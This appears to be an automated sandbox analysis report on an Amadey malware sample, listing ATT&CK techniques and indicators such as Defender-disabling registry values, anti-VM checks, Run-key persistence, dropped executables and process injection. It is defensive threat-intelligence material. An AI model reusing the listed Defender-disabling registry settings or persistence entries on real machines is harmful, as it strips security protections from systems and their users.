amadey | 1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	b3da59fcc7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	b3da59fcc7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	b3da59fcc7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	b3da59fcc7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	b3da59fcc7.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	b3da59fcc7.exe

Orcus
Orcus is a Remote Access Trojan that is being sold on underground forums.
rat spyware stealer orcus
Orcus family
orcus
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3564 created 3364	3564	Dr.com	56

TA505
Cybercrime group active since 2015, responsible for families like Dridex and Locky.
ta505
Ta505 family
ta505

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f56e441c8f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1dd8bdd825.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b3da59fcc7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2M4078.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	BhD8htX.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4fe69191d8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1G18s2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3Z39A.exe

Orcurs Rat Executable 1 IoCs

resource	yara_rule
behavioral1/memory/3548-1290-0x0000000000D00000-0x0000000001104000-memory.dmp	orcus

Blocklisted process makes network request 3 IoCs

flow	pid	Process
200	6876	powershell.exe
201	812	powershell.exe
203	5628	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
6456	powershell.exe
5188	powershell.exe
4524	powershell.exe
6456	powershell.exe
5188	powershell.exe
812	powershell.exe
5628	powershell.exe
5748	powershell.exe
4872	powershell.exe
6876	powershell.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 24 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1G18s2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2M4078.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	BhD8htX.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1dd8bdd825.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4fe69191d8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1G18s2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f56e441c8f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b3da59fcc7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4fe69191d8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2M4078.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	BhD8htX.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3Z39A.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f56e441c8f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1dd8bdd825.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b3da59fcc7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3Z39A.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	1G18s2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	wL3EGdM.exe

Executes dropped EXE 23 IoCs

pid	Process
4048	T5v89.exe
1848	1G18s2.exe
2564	skotes.exe
2904	2M4078.exe
4764	BhD8htX.exe
2068	i1A5m12.exe
1988	i1A5m12.tmp
1888	rafencoder.exe
1912	3Z39A.exe
3620	wL3EGdM.exe
412	skotes.exe
1500	f56e441c8f.exe
3564	Dr.com
2388	1dd8bdd825.exe
512	69efc78da7.exe
6684	b3da59fcc7.exe
3548	RegAsm.exe
5732	4fe69191d8.exe
6616	smartscreen.exe
6300	COMSurrogate.exe
6604	skotes.exe
2020	mi.exe
940	skotes.exe

Identifies Wine through registry keys 2 TTPs 12 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	b3da59fcc7.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	1G18s2.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	2M4078.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	1dd8bdd825.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	BhD8htX.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	3Z39A.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	f56e441c8f.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	4fe69191d8.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	skotes.exe

Loads dropped DLL 4 IoCs

pid	Process
1988	i1A5m12.tmp
1888	rafencoder.exe
2020	mi.exe
2020	mi.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	b3da59fcc7.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	b3da59fcc7.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1dd8bdd825.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012576001\\1dd8bdd825.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\69efc78da7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012577001\\69efc78da7.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b3da59fcc7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012578001\\b3da59fcc7.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe"	smartscreen.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM Surrogate = "C:\\Users\\Admin\\AppData\\Local\\asm\\COMSurrogate.exe"	COMSurrogate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	T5v89.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f56e441c8f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012575001\\f56e441c8f.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
204	api.ipify.org
205	api.ipify.org

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000f000000023c8d-578.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
2544	tasklist.exe
2044	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

pid	Process
1848	1G18s2.exe
2564	skotes.exe
2904	2M4078.exe
4764	BhD8htX.exe
1912	3Z39A.exe
412	skotes.exe
1500	f56e441c8f.exe
2388	1dd8bdd825.exe
6684	b3da59fcc7.exe
5732	4fe69191d8.exe
6604	skotes.exe
940	skotes.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\PackageExpression	wL3EGdM.exe
File created	C:\Windows\Tasks\skotes.job	1G18s2.exe
File opened for modification	C:\Windows\MovieArchives	wL3EGdM.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
3652	2904	WerFault.exe	86
3468	2904	WerFault.exe	86
4532	4764	WerFault.exe	93
3952	4764	WerFault.exe	93
4748	1500	WerFault.exe	126
3936	1500	WerFault.exe	126

System Location Discovery: System Language Discovery 1 TTPs 59 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	69efc78da7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wL3EGdM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4fe69191d8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BhD8htX.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1G18s2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1dd8bdd825.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i1A5m12.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i1A5m12.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	69efc78da7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Dr.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	T5v89.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f56e441c8f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	69efc78da7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b3da59fcc7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2M4078.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rafencoder.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3Z39A.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
4532	taskkill.exe
2324	taskkill.exe
4796	taskkill.exe
4704	taskkill.exe
4572	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	firefox.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1264	schtasks.exe
1204	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1848	1G18s2.exe
1848	1G18s2.exe
2564	skotes.exe
2564	skotes.exe
2904	2M4078.exe
2904	2M4078.exe
4764	BhD8htX.exe
4764	BhD8htX.exe
1988	i1A5m12.tmp
1988	i1A5m12.tmp
1912	3Z39A.exe
1912	3Z39A.exe
412	skotes.exe
412	skotes.exe
1500	f56e441c8f.exe
1500	f56e441c8f.exe
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
2388	1dd8bdd825.exe
2388	1dd8bdd825.exe
512	69efc78da7.exe
512	69efc78da7.exe
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
3564	Dr.com
6684	b3da59fcc7.exe
6684	b3da59fcc7.exe
512	69efc78da7.exe
512	69efc78da7.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	2044	tasklist.exe
Token: SeDebugPrivilege	2544	tasklist.exe
Token: SeDebugPrivilege	4532	taskkill.exe
Token: SeDebugPrivilege	2324	taskkill.exe
Token: SeDebugPrivilege	4796	taskkill.exe
Token: SeDebugPrivilege	4704	taskkill.exe
Token: SeDebugPrivilege	4572	taskkill.exe
Token: SeDebugPrivilege	1852	firefox.exe
Token: SeDebugPrivilege	1852	firefox.exe
Token: SeDebugPrivilege	6684	b3da59fcc7.exe
Token: SeDebugPrivilege	3548	RegAsm.exe
Token: SeDebugPrivilege	6456	powershell.exe
Token: SeDebugPrivilege	6876	powershell.exe
Token: SeDebugPrivilege	5188	powershell.exe
Token: SeDebugPrivilege	812	powershell.exe
Token: SeDebugPrivilege	5628	powershell.exe
Token: SeDebugPrivilege	5748	powershell.exe
Token: SeDebugPrivilege	4872	powershell.exe
Token: SeDebugPrivilege	4524	powershell.exe
Token: SeDebugPrivilege	6300	COMSurrogate.exe
Token: SeLockMemoryPrivilege	2020	mi.exe
Token: SeLockMemoryPrivilege	2020	mi.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
1848	1G18s2.exe
1988	i1A5m12.tmp
3564	Dr.com
3564	Dr.com
3564	Dr.com
512	69efc78da7.exe
512	69efc78da7.exe
512	69efc78da7.exe
512	69efc78da7.exe
512	69efc78da7.exe
512	69efc78da7.exe
512	69efc78da7.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
512	69efc78da7.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
512	69efc78da7.exe
512	69efc78da7.exe
512	69efc78da7.exe
2020	mi.exe

Suspicious use of SendNotifyMessage 34 IoCs

pid	Process
3564	Dr.com
3564	Dr.com
3564	Dr.com
512	69efc78da7.exe
512	69efc78da7.exe
512	69efc78da7.exe
512	69efc78da7.exe
512	69efc78da7.exe
512	69efc78da7.exe
512	69efc78da7.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
512	69efc78da7.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
1852	firefox.exe
512	69efc78da7.exe
512	69efc78da7.exe
512	69efc78da7.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1852	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3448 wrote to memory of 4048	3448	1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe	83
PID 3448 wrote to memory of 4048	3448	1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe	83
PID 3448 wrote to memory of 4048	3448	1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe	83
PID 4048 wrote to memory of 1848	4048	T5v89.exe	84
PID 4048 wrote to memory of 1848	4048	T5v89.exe	84
PID 4048 wrote to memory of 1848	4048	T5v89.exe	84
PID 1848 wrote to memory of 2564	1848	1G18s2.exe	85
PID 1848 wrote to memory of 2564	1848	1G18s2.exe	85
PID 1848 wrote to memory of 2564	1848	1G18s2.exe	85
PID 4048 wrote to memory of 2904	4048	T5v89.exe	86
PID 4048 wrote to memory of 2904	4048	T5v89.exe	86
PID 4048 wrote to memory of 2904	4048	T5v89.exe	86
PID 2564 wrote to memory of 4764	2564	skotes.exe	93
PID 2564 wrote to memory of 4764	2564	skotes.exe	93
PID 2564 wrote to memory of 4764	2564	skotes.exe	93
PID 2564 wrote to memory of 2068	2564	skotes.exe	97
PID 2564 wrote to memory of 2068	2564	skotes.exe	97
PID 2564 wrote to memory of 2068	2564	skotes.exe	97
PID 2068 wrote to memory of 1988	2068	i1A5m12.exe	99
PID 2068 wrote to memory of 1988	2068	i1A5m12.exe	99
PID 2068 wrote to memory of 1988	2068	i1A5m12.exe	99
PID 1988 wrote to memory of 3844	1988	i1A5m12.tmp	103
PID 1988 wrote to memory of 3844	1988	i1A5m12.tmp	103
PID 1988 wrote to memory of 3844	1988	i1A5m12.tmp	103
PID 1988 wrote to memory of 1888	1988	i1A5m12.tmp	104
PID 1988 wrote to memory of 1888	1988	i1A5m12.tmp	104
PID 1988 wrote to memory of 1888	1988	i1A5m12.tmp	104
PID 3844 wrote to memory of 2544	3844	net.exe	106
PID 3844 wrote to memory of 2544	3844	net.exe	106
PID 3844 wrote to memory of 2544	3844	net.exe	106
PID 3448 wrote to memory of 1912	3448	1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe	113
PID 3448 wrote to memory of 1912	3448	1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe	113
PID 3448 wrote to memory of 1912	3448	1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe	113
PID 2564 wrote to memory of 3620	2564	skotes.exe	118
PID 2564 wrote to memory of 3620	2564	skotes.exe	118
PID 2564 wrote to memory of 3620	2564	skotes.exe	118
PID 3620 wrote to memory of 4956	3620	wL3EGdM.exe	120
PID 3620 wrote to memory of 4956	3620	wL3EGdM.exe	120
PID 3620 wrote to memory of 4956	3620	wL3EGdM.exe	120
PID 4956 wrote to memory of 2044	4956	cmd.exe	122
PID 4956 wrote to memory of 2044	4956	cmd.exe	122
PID 4956 wrote to memory of 2044	4956	cmd.exe	122
PID 4956 wrote to memory of 3844	4956	cmd.exe	123
PID 4956 wrote to memory of 3844	4956	cmd.exe	123
